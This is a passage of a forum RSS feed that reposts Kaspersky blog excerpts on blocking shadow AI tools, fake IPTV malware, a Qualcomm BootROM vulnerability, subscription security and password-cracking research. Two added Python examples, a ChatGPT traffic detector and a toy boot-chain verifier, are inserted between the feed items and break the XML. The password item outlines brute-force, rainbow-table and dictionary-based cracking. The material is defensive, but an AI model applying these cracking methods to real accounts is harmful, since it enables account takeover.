<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Geeks for your information - Kaspersky Security Blog]]></title>
		<link>https://www.geeks.fyi/</link>
		<description><![CDATA[Geeks for your information - https://www.geeks.fyi]]></description>
		<pubDate>Fri, 19 Jun 2026 18:23:59 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Taming shadow-AI on corporate devices]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=22055</link>
			<pubDate>Thu, 11 Jun 2026 10:57:01 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=22055</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">How to detect and block unauthorized AI tools in an organization.</span><br />
 <br />
Unchecked AI in the workplace quickly becomes a massive loophole for data leaks and security breaches. All too often, employees drop sensitive company data into public chatbots, or install rogue AI assistants on their own — in the process handing over way too much access. In a <a href="https://www.kaspersky.com/blog/how-to-detect-disable-ai-in-enterprise-top-principles/55784/" target="_blank" rel="noopener" class="mycode_url">previous post</a>, we broke down the different types of risky AI systems, and later shared some <a href="https://www.kaspersky.com/blog/how-to-disable-ai-in-copilot-gemini-apple-intelligence/55923/" target="_blank" rel="noopener" class="mycode_url">tips</a> on how to turn off the built-in AI features on major tech platforms. Today let’s take a look at practical ways to block or restrict the unauthorized “helpers” employees might be using — from ChatGPT and Grammarly, to meeting bots like Fireflies and Read AI.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How to detect and restrict ChatGPT</span><br />
<br />
ChatGPT is the biggest culprit when it comes to unauthorized AI use worldwide. A quick word of warning, though: an outright ban only sends users hunting for sketchy third-party sites or messaging app chatbots that hook into the same service. That’s why it’s always a good idea to offer an approved alternative before pulling the plug.<br />
<br />
Detecting it: keep an eye on the NGFW or web filter for traffic heading to chat.openai.com, chatgpt.com, oaistatic.com, oaiusercontent.com, or cdn.oaistatic.com. It’s also smart to use <a href="https://www.kaspersky.com/next?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kdaily_wpplaceholder_sm-team___knext____a8c0f733e524af27" target="_blank" rel="noopener" class="mycode_url">EDR/EPP tools</a> to scan browser histories, installed apps, and browser extensions across corporate devices.<br />
<br />
Locking it down: use the firewall or web filter to block the entire AI Services category, and set up DNS to reroute traffic away from those OpenAI domains. Browser policies can also be used to ban ChatGPT-powered extensions. Better yet, block all extensions not on a pre-approved allowlist. Finally, use application controls and EPP solutions to stop users from installing the official desktop app (ChatGPT.exe or com.openai.chat).<br />
<br />
<a href="https://www.kaspersky.com/blog/how-to-detect-disable-shadow-ai-in-enterprise/55952/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">How to detect and block unauthorized AI tools in an organization.</span><br />
 <br />
Unchecked AI in the workplace quickly becomes a massive loophole for data leaks and security breaches. All too often, employees drop sensitive company data into public chatbots, or install rogue AI assistants on their own — in the process handing over way too much access. In a <a href="https://www.kaspersky.com/blog/how-to-detect-disable-ai-in-enterprise-top-principles/55784/" target="_blank" rel="noopener" class="mycode_url">previous post</a>, we broke down the different types of risky AI systems, and later shared some <a href="https://www.kaspersky.com/blog/how-to-disable-ai-in-copilot-gemini-apple-intelligence/55923/" target="_blank" rel="noopener" class="mycode_url">tips</a> on how to turn off the built-in AI features on major tech platforms. Today let’s take a look at practical ways to block or restrict the unauthorized “helpers” employees might be using — from ChatGPT and Grammarly, to meeting bots like Fireflies and Read AI.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How to detect and restrict ChatGPT</span><br />
<br />
ChatGPT is the biggest culprit when it comes to unauthorized AI use worldwide. A quick word of warning, though: an outright ban only sends users hunting for sketchy third-party sites or messaging app chatbots that hook into the same service. That’s why it’s always a good idea to offer an approved alternative before pulling the plug.<br />
<br />
Detecting it: keep an eye on the NGFW or web filter for traffic heading to chat.openai.com, chatgpt.com, oaistatic.com, oaiusercontent.com, or cdn.oaistatic.com. It’s also smart to use <a href="https://www.kaspersky.com/next?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kdaily_wpplaceholder_sm-team___knext____a8c0f733e524af27" target="_blank" rel="noopener" class="mycode_url">EDR/EPP tools</a> to scan browser histories, installed apps, and browser extensions across corporate devices.<br />
<br />
Locking it down: use the firewall or web filter to block the entire AI Services category, and set up DNS to reroute traffic away from those OpenAI domains. Browser policies can also be used to ban ChatGPT-powered extensions. Better yet, block all extensions not on a pre-approved allowlist. Finally, use application controls and EPP solutions to stop users from installing the official desktop app (ChatGPT.exe or com.openai.chat).<br />
<br />
<a href="https://www.kaspersky.com/blog/how-to-detect-disable-shadow-ai-in-enterprise/55952/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
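Detecting the ChatGPT traffic and installs that the post above describes, as an added example (not code from the original post or from Kaspersky). It walks web-proxy log lines and a software-inventory list, both constructed here in a squid-style "timestamp client method target" format that is an assumption, and matches the domains and app identifiers the post names by suffix, so cdn.oaistatic.com and any other subdomain are caught by the oaistatic.com entry.

```python
"""Flag hosts talking to the ChatGPT domains named in the post, from proxy log lines.

Added example, not code from the original post or from Kaspersky. The log
format (squid-style: timestamp, client IP, method, URL or CONNECT target),
the client addresses and the inventory entries are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Domains named in the post. Matching is by suffix so that any subdomain
# (ab.chatgpt.com, cdn.oaistatic.com, files.oaiusercontent.com) is caught too.
CHATGPT_DOMAINS = (
    "chat.openai.com",
    "chatgpt.com",
    "oaistatic.com",
    "oaiusercontent.com",
)

# Desktop-app identifiers from the post, matched against a software inventory.
CHATGPT_APP_IDS = ("chatgpt.exe", "com.openai.chat")

LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(GET|POST|CONNECT)\s+(\S+)")

def host_of(target: str) -> str:
    """Return the bare host from a URL or from a CONNECT host:port target."""
    if "://" in target:
        return (urlsplit(target).hostname or "").lower()
    return target.rsplit(":", 1)[0].lower()

def is_chatgpt_host(host: str) -> bool:
    """Exact or subdomain match; notchatgpt.com must not match chatgpt.com."""
    return any(host == d or host.endswith("." + d) for d in CHATGPT_DOMAINS)

def find_chatgpt_clients(log_lines):
    """Map client IP -> sorted list of ChatGPT hosts it contacted."""
    hits = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue            # unparseable line: skip, do not crash the sweep
        _ts, client, _method, target = m.groups()
        host = host_of(target)
        if is_chatgpt_host(host):
            hits[client].add(host)
    return {c: sorted(h) for c, h in hits.items()}

def find_chatgpt_installs(inventory):
    """inventory: iterable of (device name, installed app or bundle id) pairs."""
    return sorted(dev for dev, app in inventory if app.lower() in CHATGPT_APP_IDS)

# Constructed sample data.
SAMPLE_LOG = [
    "1718100001.123 10.0.0.5 CONNECT chatgpt.com:443",
    "1718100002.456 10.0.0.5 GET https://cdn.oaistatic.com/assets/app.js",
    "1718100003.789 10.0.0.7 GET https://www.example.com/index.html",
    "1718100004.012 10.0.0.9 CONNECT chat.openai.com:443",
    "1718100005.345 10.0.0.9 POST https://files.oaiusercontent.com/upload",
    "1718100006.678 10.0.0.7 CONNECT notchatgpt.com:443",
    "garbage line that does not parse",
]
SAMPLE_INVENTORY = [
    ("WS-0005", "ChatGPT.exe"),
    ("WS-0007", "Slack.exe"),
    ("MAC-0009", "com.openai.chat"),
]

if __name__ == "__main__":
    for client, hosts in find_chatgpt_clients(SAMPLE_LOG).items():
        print(f"{client} reached {', '.join(hosts)}")
    print("desktop app installed on:", find_chatgpt_installs(SAMPLE_INVENTORY))
```

The suffix check matters in both directions: a plain substring test would flag notchatgpt.com, while an exact-match list would miss new subdomains the service introduces. Pair the network view with the inventory view, since a user on a VPN or a mobile hotspot leaves no proxy trace but the installed app still shows up.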
		<item>
			<title><![CDATA[Don’t let fake IPTV apps ruin your World Cup]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=22011</link>
			<pubDate>Sat, 30 May 2026 07:59:59 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=22011</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">We break down how cybercriminals are using fake IPTV apps to spread malware, and how you can protect your devices and data during the World Cup.</span><br />
 <br />
Threat actors are already gearing up for this year’s biggest football (soccer) event, the FIFA World Cup 2026. With millions of fans looking for ways to stream matches online, many will turn to IPTV apps to watch live TV broadcasts over the internet. It’s no surprise, then, that cybersecurity researchers have discovered multiple campaigns over the past few months where malware was disguised as fake Android IPTV apps.<br />
<br />
In this post, we discuss what IPTV apps are, how criminals use fake versions to spread malware, what this malware is capable of, and, most importantly, how to avoid becoming a victim.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What are IPTV apps?</span><br />
<br />
IPTV stands for Internet Protocol Television. This technology delivers TV content over the internet instead of through cable, over-the-air antennas, or satellites. Naturally, the simplest and most common examples of IPTV are the official platforms of TV networks, which can include both websites and dedicated apps.<br />
<br />
However, alongside official options, pirate IPTV services also exist. They usually lure users with free or dirt-cheap access to content that can otherwise be hard to find without expensive subscriptions — most notably broadcasts of various sporting events, football matches in particular.<br />
<br />
As is typically the case with pirated content, these apps are blocked from official app stores, forcing users to download them from third-party sites. Consequently, the risk of using these services isn’t tied to IPTV technology itself, but rather to the fake apps and modified APK files distributed under the guise of well-known platforms — both official and pirated.<br />
<br />
<a href="https://www.kaspersky.com/blog/fake-iptv-apps-spread-android-malware/55872/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">We break down how cybercriminals are using fake IPTV apps to spread malware, and how you can protect your devices and data during the World Cup.</span><br />
 <br />
Threat actors are already gearing up for this year’s biggest football (soccer) event, the FIFA World Cup 2026. With millions of fans looking for ways to stream matches online, many will turn to IPTV apps to watch live TV broadcasts over the internet. It’s no surprise, then, that cybersecurity researchers have discovered multiple campaigns over the past few months where malware was disguised as fake Android IPTV apps.<br />
<br />
In this post, we discuss what IPTV apps are, how criminals use fake versions to spread malware, what this malware is capable of, and, most importantly, how to avoid becoming a victim.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What are IPTV apps?</span><br />
<br />
IPTV stands for Internet Protocol Television. This technology delivers TV content over the internet instead of through cable, over-the-air antennas, or satellites. Naturally, the simplest and most common examples of IPTV are the official platforms of TV networks, which can include both websites and dedicated apps.<br />
<br />
However, alongside official options, pirate IPTV services also exist. They usually lure users with free or dirt-cheap access to content that can otherwise be hard to find without expensive subscriptions — most notably broadcasts of various sporting events, football matches in particular.<br />
<br />
As is typically the case with pirated content, these apps are blocked from official app stores, forcing users to download them from third-party sites. Consequently, the risk of using these services isn’t tied to IPTV technology itself, but rather to the fake apps and modified APK files distributed under the guise of well-known platforms — both official and pirated.<br />
<br />
<a href="https://www.kaspersky.com/blog/fake-iptv-apps-spread-android-malware/55872/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Qualcomm vulnerability: phone repairs and car maintenance are no longer safe]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21993</link>
			<pubDate>Sat, 23 May 2026 07:10:49 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21993</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Our experts have discovered an unpatchable vulnerability in Qualcomm chips used everywhere: from smart-home devices, smartphones and cars, to industrial equipment. What risks does it pose, and what can you do to protect yourself?</span><br />
 <br />
Imagine handing your smartphone over for repair. A couple of days later, you pick it up — and great, it’s working again! But you won’t even realize that your device has been injected with malicious code, allowing attackers to access your smartphone even when it’s locked.<br />
<br />
This is the beginning of the story shared by Kaspersky ICS CERT researchers, Alexander Kozlov and Sergey Anufrienko, at the <a href="https://blackhat.com/asia-26/" target="_blank" rel="noopener" class="mycode_url">Black Hat Asia 2026 conference</a>. They managed to uncover a vulnerability that flips conventional assumptions about smartphone and IoT security on their head. Its core lies at the very heart of Qualcomm chips.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What is BootROM?</span><br />
<br />
To grasp the severity of this discovery, we first need to look at how a modern device powered by a Qualcomm chip boots up. Think of it as a fortress with multiple layers of security. Each subsequent layer verifies the pass issued by the previous one. The bedrock foundation — the most trusted layer of them all — is the BootROM, a read-only memory baked directly into the silicon that can’t be modified once it comes off the <a href="https://en.wikipedia.org/wiki/Semiconductor_device_fabrication" target="_blank" rel="noopener" class="mycode_url">fab</a>.<br />
<br />
The BootROM is the very first thing to run when a device powers on. It verifies the signature of the next bootloader, which in turn verifies the next, building a chain of trust all the way up to the operating system. If an attacker can compromise this chain at the BootROM level, it’s game over: the malicious code will execute before the main operating system even has a chance to load.<br />
<br />
This is exactly what attackers can do by exploiting the <a href="https://ics-cert.kaspersky.com/vulnerabilities/qualcomm-chipsets-series-write-what-where-condition-vulnerability-in-bootrom/" target="_blank" rel="noopener" class="mycode_url">CVE-2026-25262</a> vulnerability discovered by Kaspersky ICS CERT researchers.<br />
<br />
<a href="https://www.kaspersky.com/blog/qualcomm-cve-2026-25262/55811/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Our experts have discovered an unpatchable vulnerability in Qualcomm chips used everywhere: from smart-home devices, smartphones and cars, to industrial equipment. What risks does it pose, and what can you do to protect yourself?</span><br />
 <br />
Imagine handing your smartphone over for repair. A couple of days later, you pick it up — and great, it’s working again! But you won’t even realize that your device has been injected with malicious code, allowing attackers to access your smartphone even when it’s locked.<br />
<br />
This is the beginning of the story shared by Kaspersky ICS CERT researchers, Alexander Kozlov and Sergey Anufrienko, at the <a href="https://blackhat.com/asia-26/" target="_blank" rel="noopener" class="mycode_url">Black Hat Asia 2026 conference</a>. They managed to uncover a vulnerability that flips conventional assumptions about smartphone and IoT security on their head. Its core lies at the very heart of Qualcomm chips.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What is BootROM?</span><br />
<br />
To grasp the severity of this discovery, we first need to look at how a modern device powered by a Qualcomm chip boots up. Think of it as a fortress with multiple layers of security. Each subsequent layer verifies the pass issued by the previous one. The bedrock foundation — the most trusted layer of them all — is the BootROM, a read-only memory baked directly into the silicon that can’t be modified once it comes off the <a href="https://en.wikipedia.org/wiki/Semiconductor_device_fabrication" target="_blank" rel="noopener" class="mycode_url">fab</a>.<br />
<br />
The BootROM is the very first thing to run when a device powers on. It verifies the signature of the next bootloader, which in turn verifies the next, building a chain of trust all the way up to the operating system. If an attacker can compromise this chain at the BootROM level, it’s game over: the malicious code will execute before the main operating system even has a chance to load.<br />
<br />
This is exactly what attackers can do by exploiting the <a href="https://ics-cert.kaspersky.com/vulnerabilities/qualcomm-chipsets-series-write-what-where-condition-vulnerability-in-bootrom/" target="_blank" rel="noopener" class="mycode_url">CVE-2026-25262</a> vulnerability discovered by Kaspersky ICS CERT researchers.<br />
<br />
<a href="https://www.kaspersky.com/blog/qualcomm-cve-2026-25262/55811/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
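The chain of trust described in the post above, as an added example that is not code from the original post, from Kaspersky or from Qualcomm, and that does not model CVE-2026-25262 itself. Each stage carries a pin for the stage that follows it; real BootROMs check public-key signatures, and SHA-256 digest pinning stands in for that here so the example needs only the standard library. The stage names and contents are constructed. The point it makes concrete is the one the post states: a tampered later stage is caught by the stage before it, while a tampered root passes the device's own checks and can only be noticed by something holding a reference the device does not.

```python
"""Toy verified-boot chain in which each stage pins the digest of the stage after it.

Added example, not code from the original post, from Kaspersky or from Qualcomm,
and it does not model CVE-2026-25262. Real BootROMs check public-key signatures;
SHA-256 digest pinning stands in for that here so the example needs only the
standard library. Stage names and contents are constructed.
"""
import hashlib
from dataclasses import dataclass

def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

@dataclass
class Stage:
    name: str
    code: bytes         # what would execute at this stage
    next_digest: str    # pin for the following stage; "" for the last stage

def stage_digest(stage: Stage) -> str:
    """What a parent pins: the child's code together with the child's own pin,
    so re-pinning a later stage is caught by the earlier check."""
    return digest(stage.code + stage.next_digest.encode())

def build_chain(stage_code):
    """stage_code: list of (name, code) from the BootROM outward to the OS.
    Pins depend on the following stage, so the chain is built back to front."""
    chain = []
    expected = ""
    for name, code in reversed(stage_code):
        stage = Stage(name, code, expected)
        expected = stage_digest(stage)
        chain.append(stage)
    chain.reverse()
    return chain

def verify_chain(chain, trusted_root_digest=None):
    """Walk the chain as boot does: each stage is checked against the pin carried
    by the stage before it. The device has no reference for its own BootROM
    (pass None): it trusts whatever is in the silicon. An external checker
    holding a known-good root digest passes it here. Returns (ok, failing_stage)."""
    if trusted_root_digest is not None:
        if stage_digest(chain[0]) != trusted_root_digest:
            return False, chain[0].name
    for parent, child in zip(chain, chain[1:]):
        if stage_digest(child) != parent.next_digest:
            return False, child.name
    return True, None

def replace_stage(chain, index, new_code):
    """Copy of the chain with stage `index` swapped for `new_code`. Stages before
    `index` keep their old pins; stages from `index` on are re-pinned consistently,
    which is exactly what an attacker who controls that stage can do."""
    stage_code = [(s.name, s.code) for s in chain]
    stage_code[index] = (chain[index].name, new_code)
    fresh = build_chain(stage_code)
    return chain[:index] + fresh[index:]

# Constructed stages, root first.
STAGES = [
    ("BootROM", b"rom: verify(next); jump"),
    ("Bootloader1", b"bl1: init memory; verify(next); jump"),
    ("Bootloader2", b"bl2: load kernel; verify(next); jump"),
    ("OS", b"kernel + ramdisk"),
]

if __name__ == "__main__":
    chain = build_chain(STAGES)
    known_good_root = stage_digest(chain[0])   # e.g. a value published out of band
    print("clean boot:", verify_chain(chain))
    tampered_bl2 = replace_stage(chain, 2, b"bl2: load backdoored kernel")
    print("tampered Bootloader2, seen by the device:", verify_chain(tampered_bl2))
    tampered_rom = replace_stage(chain, 0, b"rom: skip verify; jump")
    print("tampered BootROM, seen by the device:", verify_chain(tampered_rom))
    print("tampered BootROM, seen with a trusted root digest:",
          verify_chain(tampered_rom, known_good_root))
```

The last two calls are the "game over" the post describes: the device's own walk of the chain reports success because the root is the thing doing the checking, and only a verifier with an independent reference for the root (remote attestation, a vendor-published measurement) can tell the difference.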
		<item>
			<title><![CDATA[Subscription security: how to protect your account, your wallet… and your sanity]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21982</link>
			<pubDate>Wed, 20 May 2026 06:10:49 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21982</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Why subscription owners need to prioritize personal and family cybersecurity.</span><br />
 <br />
Have you ever tried to tally up how much you spend on subscriptions each month? Music, movies, gaming, language courses, delivery services, <a href="https://www.thedrive.com/news/bmw-commits-to-subscriptions-even-after-heated-seat-debacle" target="_blank" rel="noopener" class="mycode_url">heated seats</a>, and even the <a href="https://www.tesla.com/support/connectivity" target="_blank" rel="noopener" class="mycode_url">ability to chat with the Grok bot directly from your car</a> — there’s a subscription for just about everything now. There’s even a subscription service specifically designed to… track your other subscriptions.<br />
<br />
The number of subscriptions varies significantly depending on <a href="https://www.kaspersky.com/blog/subscrab-custom-subscription-manager/52516/" target="_blank" rel="noopener" class="mycode_url">where you live</a>, but <a href="https://marketingltb.com/blog/statistics/subscription-statistics/" target="_blank" rel="noopener" class="mycode_url">statistically</a>, 78% of adults worldwide have at least one paid subscription, with the average user juggling 5.6 active services. Furthermore, a large portion of these are family plans used by groups of close relatives… and sometimes other people: 37% of users share their subscriptions outside their immediate family.<br />
<br />
Because subscription accounts, especially family plans, often contain sensitive personal data, they’ve become a prime target for cybercriminals. Today we look at how to manage your subscriptions securely, avoid having your accounts compromised, and keep from falling for scammers’ latest tricks.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Security of shared accounts and subscriptions</span><br />
<br />
Why would anyone want to hack your subscription? Even if the service only offers entertainment, your account almost certainly contains sensitive information: your name, address, email, phone number, the names of other members, and other personally identifiable information. This data is then <a href="https://www.kaspersky.com/blog/what-happens-to-data-after-phishing/54968/" target="_blank" rel="noopener" class="mycode_url">sold on the dark web</a> and used for further attacks.<br />
<br />
<a href="https://www.kaspersky.com/blog/how-to-manage-subscriptions-safely/55776/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Why subscription owners need to prioritize personal and family cybersecurity.</span><br />
 <br />
Have you ever tried to tally up how much you spend on subscriptions each month? Music, movies, gaming, language courses, delivery services, <a href="https://www.thedrive.com/news/bmw-commits-to-subscriptions-even-after-heated-seat-debacle" target="_blank" rel="noopener" class="mycode_url">heated seats</a>, and even the <a href="https://www.tesla.com/support/connectivity" target="_blank" rel="noopener" class="mycode_url">ability to chat with the Grok bot directly from your car</a> — there’s a subscription for just about everything now. There’s even a subscription service specifically designed to… track your other subscriptions.<br />
<br />
The number of subscriptions varies significantly depending on <a href="https://www.kaspersky.com/blog/subscrab-custom-subscription-manager/52516/" target="_blank" rel="noopener" class="mycode_url">where you live</a>, but <a href="https://marketingltb.com/blog/statistics/subscription-statistics/" target="_blank" rel="noopener" class="mycode_url">statistically</a>, 78% of adults worldwide have at least one paid subscription, with the average user juggling 5.6 active services. Furthermore, a large portion of these are family plans used by groups of close relatives… and sometimes other people: 37% of users share their subscriptions outside their immediate family.<br />
<br />
Because subscription accounts, especially family plans, often contain sensitive personal data, they’ve become a prime target for cybercriminals. Today we look at how to manage your subscriptions securely, avoid having your accounts compromised, and keep from falling for scammers’ latest tricks.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Security of shared accounts and subscriptions</span><br />
<br />
Why would anyone want to hack your subscription? Even if the service only offers entertainment, your account almost certainly contains sensitive information: your name, address, email, phone number, the names of other members, and other personally identifiable information. This data is then <a href="https://www.kaspersky.com/blog/what-happens-to-data-after-phishing/54968/" target="_blank" rel="noopener" class="mycode_url">sold on the dark web</a> and used for further attacks.<br />
<br />
<a href="https://www.kaspersky.com/blog/how-to-manage-subscriptions-safely/55776/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cracked in under a minute: (nearly) every other password]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21950</link>
			<pubDate>Sun, 10 May 2026 11:44:29 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21950</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">We’ve revisited our study on the crackability of real-world passwords leaked on the dark web — originally conducted two years ago. The findings are sobering: nearly every other password can be cracked in under a minute, and three out of five take less than an hour. How can we move away from insecure passwords?</span><br />
 <br />
Every year, hundreds of millions of real user passwords leak onto the dark web. We analyzed 231 million unique passwords from dark-web leaks between 2023 and 2026, and the conclusions are bleak: the vast majority are extremely weak. To crack 60% of these passwords, a hacker needs only an hour and a few dollars in their pocket. Furthermore, password cracking is accelerating by the year; in <a href="https://www.kaspersky.com/blog/password-can-be-hacked-in-one-hour/51469/" target="_blank" rel="noopener" class="mycode_url">our similar 2024 study</a>, the percentage of vulnerable passwords was lower.<br />
<br />
Today we’re looking at just how reliable the average password is (spoiler: not really), and how you can secure your data and accounts using more robust methods. At the same time, we’ll highlight the patterns most commonly found in actual user passwords.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How passwords are cracked</span><br />
<br />
In our previous study, we detailed the <a href="https://www.kaspersky.com/blog/password-can-be-hacked-in-one-hour/51469/" target="_blank" rel="noopener" class="mycode_url">methods for storing and cracking passwords</a>, but here’s a quick refresher on the essentials.<br />
<br />
These days, passwords are almost never stored in plain text. For instance, if you create an account with the password “Password123!”, the server won’t store it as-is. Instead, the password is <a href="https://www.kaspersky.com/blog/the-wonders-of-hashing/4441/" target="_blank" rel="noopener" class="mycode_url">hashed</a> using specific algorithms, turning it into a fixed-length string of letters and numbers (a hash), which is what actually stays on the server. For example, here’s what the MD5 hash for “Password123!” looks like:<br />
 <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>2c103f2c4ed1e59c0b4e2e01821770fa</code></div></div><br />
<br />
Every time the user enters their password, it’s converted into a hash and compared against the one stored on the server; if the hashes match, the password is correct. If an attacker gets their hands on this hash, they have to decrypt it to recover the original password — this is what’s known as “password cracking”. This is typically done using owned or rented GPUs, and several methods can be employed for the crack:<ul class="mycode_list"><li><a href="https://en.wikipedia.org/wiki/Brute-force_search" target="_blank" rel="noopener" class="mycode_url"><span style="font-weight: bold;" class="mycode_b">Exhaustive enumeration (brute force)</span></a><span style="font-weight: bold;" class="mycode_b">.</span> The computer tries every possible combination of characters, calculating the hash for each one. This method is the easiest way to crack short passwords, or those consisting of a single character set (such as digits only).<br />
</li>
<li><a href="https://en.wikipedia.org/wiki/Rainbow_table" target="_blank" rel="noopener" class="mycode_url"><span style="font-weight: bold;" class="mycode_b">Rainbow tables</span></a><span style="font-weight: bold;" class="mycode_b">.</span> A total nightmare for anyone with a simple password, this is essentially a “phone book” for passwords whose hashes have already been cracked via brute force or smart algorithms. All an attacker has to do is find a matching hash and see which password corresponds to it.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Smart cracking</span>. These algorithms are trained on databases of leaked passwords. They understand the frequency of different character combinations, and run their checks from the most likely to the least popular sequences. They account for dictionary words, character substitutions (a → @ or s → &#36;), and consider common password structures like “dictionary word + number + special character”, while checking hashes against rainbow tables. Combining these methods significantly accelerates the cracking process.<br />
</li>
</ul>
Beyond that, attackers can also intercept passwords in plain text. There are numerous ways to do this, ranging from phishing (where a victim is lured to a fake web page and enters their password voluntarily) and keyloggers that capture keystrokes, to stealers or Trojans that swipe documents, cookies, clipboard data, and more. Unfortunately, many users keep their passwords as plain text in notes, messaging apps, and documents, or save them in browsers where <a href="https://www.kaspersky.com/blog/how-to-store-passwords-securely/48784/" target="_blank" rel="noopener" class="mycode_url">attackers can extract them in seconds</a>.<br />
<br />
<a href="https://www.kaspersky.com/blog/passwords-hacking-research-2026/55743/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">We’ve revisited our study on the crackability of real-world passwords leaked on the dark web — originally conducted two years ago. The findings are sobering: nearly every other password can be cracked in under a minute, and three out of five take less than an hour. How can we move away from insecure passwords?</span><br />
 <br />
Every year, hundreds of millions of real user passwords leak onto the dark web. We analyzed 231 million unique passwords from dark-web leaks between 2023 and 2026, and the conclusions are bleak: the vast majority are extremely weak. To crack 60% of these passwords, a hacker needs only an hour and a few dollars in their pocket. Furthermore, password cracking is accelerating by the year; in <a href="https://www.kaspersky.com/blog/password-can-be-hacked-in-one-hour/51469/" target="_blank" rel="noopener" class="mycode_url">our similar 2024 study</a>, the percentage of vulnerable passwords was lower.<br />
<br />
Today we’re looking at just how reliable the average password is (spoiler: not really), and how you can secure your data and accounts using more robust methods. At the same time, we’ll highlight the patterns most commonly found in actual user passwords.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How passwords are cracked</span><br />
<br />
In our previous study, we detailed the <a href="https://www.kaspersky.com/blog/password-can-be-hacked-in-one-hour/51469/" target="_blank" rel="noopener" class="mycode_url">methods for storing and cracking passwords</a>, but here’s a quick refresher on the essentials.<br />
<br />
These days, passwords are almost never stored in plain text. For instance, if you create an account with the password “Password123!”, the server won’t store it as-is. Instead, the password is <a href="https://www.kaspersky.com/blog/the-wonders-of-hashing/4441/" target="_blank" rel="noopener" class="mycode_url">hashed</a> using specific algorithms, turning it into a fixed-length string of letters and numbers (a hash), which is what actually stays on the server. For example, here’s what the MD5 hash for “Password123!” looks like:<br />
 <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>2c103f2c4ed1e59c0b4e2e01821770fa</code></div></div><br />
<br />
